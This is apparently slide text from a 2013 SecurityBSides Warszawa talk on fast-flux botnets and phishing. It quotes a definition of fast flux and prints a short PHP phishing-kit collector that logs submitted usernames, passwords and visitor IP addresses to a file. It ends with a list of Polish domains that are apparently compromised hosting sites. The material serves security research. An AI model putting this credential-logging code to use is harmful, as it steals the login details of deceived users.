SecurityBSides Warszawa 2013 - Maciej Kotowicz / @maciekkotowicz
Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network (...) hosts acting as proxies. (...) The basic idea behind Fast flux is to have numerous IP addresses associated with a single fully qualified domain name, where the IP addresses are swapped in and out with extremely high frequency, through changing DNS records.
$username1 = $_POST['client_id'];
$username2 = $_POST['password'];
$ip= getenv("REMOTE_ADDR");
$out = fopen("cont.txt", "a");
if (!$out) { print("Could not append to file"); exit; }
fwrite($out,"user: "."$username1\r\n");
fwrite($out,"pass: "."$username2\r\n");
fwrite($out,"$ip "."\r\n");
akademiaprzedszkolaka_wloclawek_pl autyzmopole_pl bodegassantarufina_pl butikcityglam_pl _bydgoskimarzec_pl cis_wieprz_pl domatrypin_pl eco_investment_pl erpebud_pl fundacjafestiwal_pl kps_siedlce_pl _logopedamedialny_wroclaw_pl motorpol_legnica_pl odnovazabrze_pl raczki_pl retroplock_pl sklep_klinkier_pl startwprzyszlosc_pl tax_perfect_pl toc_mscdn_pl travelest_com_pl tur_bud_com_pl wkl310sobol_pl zkielcnakoroneziemi_pl zstm_pl
